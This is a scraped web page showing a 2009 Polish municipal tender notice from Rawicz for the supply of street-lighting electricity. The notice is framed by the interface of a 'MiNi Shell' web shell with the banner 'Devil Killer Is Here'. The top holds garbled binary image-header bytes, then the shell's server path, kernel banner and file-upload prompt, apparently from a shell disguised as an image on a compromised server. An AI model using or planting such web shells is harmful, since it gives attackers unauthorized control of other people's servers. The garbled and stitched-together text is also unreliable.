JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090114/4406-N-2009.html

<p class="kh_header"><b>Rawicz: Dostawa energii elektrycznej dla potrzeb oświetlenia ulicznego na terenie miasta i gminy Rawicz</b><br>
<b>Numer ogłoszenia: 4406 - 2009; data zamieszczenia: 14.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa energii elektrycznej dla potrzeb oświetlenia ulicznego na terenie miasta i gminy Rawicz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa energii elektrycznej dla potrzeb oświetlenia ulicznego na terenie miasta i gminy Rawicz obejmująca kompleksowo sprzedaż energii elektrycznej oraz świadczenie usług przesyłania i dystrybucji energii elektrycznej. Obiekty - punkty objęte dostawą energii podano w załączniku do SIWZ. 2. Charakterystyka - dane techniczne: 1) sumaryczna moc zamówiona 1058 kW; 2) ilośc punktów poboru mocy - 96 sztuk; 3) planowane całkowiete zużycie energii w okresie realizacji niniejszego zamówienia (12 miesięcy) 1.600.000 kWh w tym dzienna - 608.000 kWh, nocna - 992.000 kWh; 4) średnia roczna od XII 2007 do XI 2008 zużycia energii - 1.589.645 kWh; 5) grupa taryfowa - C 12b; 6) obiekty przeznaczone do zasilania należą do V grupy przyłączeniowej; 7) ilość punktów świetlnych 2.611 sztuk. 3. Zestawienie miejsc poboru energii dla celów oświetlenia ulicznego na terenie miasta i gminy Rawicz określa załącznik nr 7 do SIWZ . 4. Określenie przewidywanego-planowanego poboru energii stanowi element niezbędny służący wyborowi najkorzystniejszej oferty i nie stanowi ze strony Zamawiającego zobowiązania do zakupu energii w podanych ilościach. Rozliczenie dostawy z usługą odbywać się będzie na podstawie faktycznego zużycia energii wg cen i stawek opłat wynikających ze złożonej oferty obowiązujących przez okres realizacji niniejszego zamówienia. 5. Wykonawca - sprzedawca energii elektrycznej na obszarze działania Operatora Systemu Dystrybucji (OSD) musi posiadać zawartą umowę z tym operatorem o świadczenie usług dystrybucji, która reguluje kompleksowo stosunki pomiędzy sprzedawcą a OSD. Zawarcie takiej umowy jest warunkiem koniecznym umożliwiającym sprzedaż energii elektrycznej przez Wykonawcę. 6.Operatorem Systemu Dystrybucji dla wszystkich obiektów jest - ENEA Operator. 7.Sprzedaż energii elektrycznej do obiektów określonych w załączniku do SIWZ, odbywać się będzie na warunkach określonych przepisami ustawy z dnia 10.04. 1997 r. Prawo Energetyczne (tj. z 2006 r. Dz. U. Nr 89 poz. 625 z późn. zm.), Kodeksu cywilnego oraz przepisami wydanymi na ich podstawie. 8. Dostarczana energia musi spełniać parametry jakościowe - zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 04.05. 2007 r. w sprawie szczegółowych warunków funkcjonowania systemu elektroenergetycznego (Dz. U. Nr 93 poz. 623) 9. Podstawą rozliczenia za przedmiot zamówienia będzie faktyczne zużycie energii w kWh, w oparciu o zaoferowane przez Wykonawcę w ofercie ceny jednostkowe..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 09.31.00.00-5, 65.30.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu wadium nie jest pobierane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się WYKONAWCY, którzy spełniają niżej określone warunki: WARUNKI 1) - spełniają warunki określone w art. 22 ust. 1 ustawy PZP i nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy tj. - posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (art. 22 ust. 1 pkt 1 ustawy); - posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (art. 22 ust. 1 pkt 2 ustawy); - znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust. 1 pkt 3 ustawy); - nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP (art. 22 ust. 1 pkt 4 i art. 24 ustawy); 2) akceptują bez zastrzeżeń warunki zamówienia określone w niniejszej SIWZ oraz w projekcie umowy - istotne dla stron postanowienia do zawarcia w umowie. 2. ZAMAWIAJĄCY dokona oceny spełnienia warunków na podstawie złożonych wraz z ofertą oświadczeń, dokumentów, wykazów szczegółowo określonych w niniejszej SIWZ. Ocena spełnienia tych warunków dokonana zostanie wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w załączonych dokumentach. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż postawione warunki WYKONAWCA spełnia. 3. Nie spełnienie chociażby jednego z w/wym. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, a oferta będzie podlegała odrzuceniu. 4. WYKONAWCY wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/wym. warunki. Przy ocenie spełnienia warunków udziału w postępowaniu, warunki i wielkości wykazane przez podmioty występujące wspólnie będą brane pod uwagę łącznie. Nie spełnienie powyższego wymagania spowoduje wykluczenie WYKONAWCY - konsorcjum. Doświadczenia podwykonawców ,ich potencjał oraz uprawnienia nie będą brane pod uwagę przy ustalaniu czy WYKONAWCA spełnia warunki udziału..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków, o których mowa w rozdziale VIII SIWZ ZAMAWIAJĄCY żąda do złożenia przez WYKONAWCĘ, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez WYKONAWCĘ, następujących dokumentów: w celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności o którym mowa w art. 22 ust. 1 oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (warunek nr 1): 1) Oświadczenie WYKONAWCY, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (załącznik nr 2); 2) Oświadczenie WYKONAWCY, że posiada niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia (załącznik nr 2); 3) Oświadczenie WYKONAWCY, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (załącznik nr 2); 4) Oświadczenie WYKONAWCY, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP (załącznik nr 3); 5) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 6) Kopia aktualnej koncesji na prowadzenie działalności gospodarczej w zakresie obrotu energią elektryczną wydana przez Prezesa Urzędu Regulacji Energetyki. 7) Oświadczenie Wykonawcy o zawarciu umowy z Operatorem Systemu Dystrybucyjnego na świadczenie usług dystrybucyjnych na obszarze, na którym znajduje się miejsce dostarczenia energii ( załącznik nr 6 ) . w celu potwierdzenia, że Wykonawca akceptuje bez zastrzeżeń warunki zamówienia określone w niniejszej SIWZ oraz w projekcie umowy - istotne dla stron postanowienia do zawarcia w umowie: 8) Oświadczenie Wykonawcy, że zapoznał się ze SIWZ a w szczególności z warunkami opisu przedmiotu zamówienia i akceptuje bez zastrzeżeń warunki zamówienia określone w Specyfikacji oraz w projekcie umowy - istotne dla stron postanowienia do zawarcia w umowie, oraz zdobył konieczne informacje do przygotowania oferty (załącznik nr 4) Ponadto Wykonawca składa: 9) Ofertę przetargową wg załączonego wzoru, 10) Kalkulacja ceny ofertowej - kosztorys ofertowy ustalający cenę zamówienia podaną w ofercie zawierający wykaz wszystkich oferowanych stawek jednostkowych sporządzony na podstawie opisu przedmiotu zamówienia (np. opłaty za 1 kWh, opłaty przejściowe, opłaty za dystrybucje, opłaty abonamentowe i inne mające wpływ na ustalenie ceny ofertowej i realizację zamówienia). 11) WYKONAWCY, którzy zamierzają powierzyć część zamówienia podwykonawcom zobowiązani są w treści oferty lub w załączniku do oferty (załącznik nr 5) wskazać tą część zamówienia (określenie zakresu dostaw - usług ), których wykonanie powierzy podwykonawcom. 12) Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik, 2. Jeżeli WYKONAWCA ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane: 1) pkt 2, 3 i 5 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 2) pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy. Dokumenty, o których mowa w ppkt 1 lit. a i c oraz ppkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w ppkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału postępowaniu o udzielenie zamówienia albo składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ppkt 1 i 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę 3. Zasady składania oferty przez podmioty występujące wspólnie i sposób komunikowania się : a) podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia, b) pełnomocnik konsorcjum pozostaje w kontakcie z Zamawiającym w toku postępowania: zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp. c) każdy z wykonawców działających wspólnie powinien złożyć wszelkie dokumenty potwierdzające spełnienie warunków udziału w postępowaniu. Wymagane oświadczenia i dokumenty wskazane w pkt 1 ppkt 4-6 tego rozdziału powinny być złożone przez każdy podmiot osobno, natomiast pozostałe oświadczenia i dokumenty mogą być złożone razem. 4. Wykonawcy zobowiązani są do przedstawienia dokumentów - oświadczeń o których wyżej mowa zawierających stwierdzenia zgodne z faktami i stanem prawnym istniejącym w chwili ich składania (aktualne dane). Dokumenty o których wyżej mowa mogą ( za wyjątkiem pełnomocnictwa, - rozdział XIV pkt 7 SIWZ) potwierdzające spełnienie wymaganych warunków mogą być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zakres i forma ww. dokumentów musi być zgodna z Rozporządzeniem Prezesa Rady Ministrów z dn. 19.05.06r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 poz. 605 ze zmianami)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Miejski Gminy Rawicz ul. Piłsudskiego 21 pok. 111, 63-900 Rawicz - odpłatnie w cenie 20 PLN (zapłata należności w kasie Urzędu) lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2009 godzina 10:00, miejsce: w siedzibie Zamawiajacego - w sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz ul. Piłsudskiego 21 pokój nr 6..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com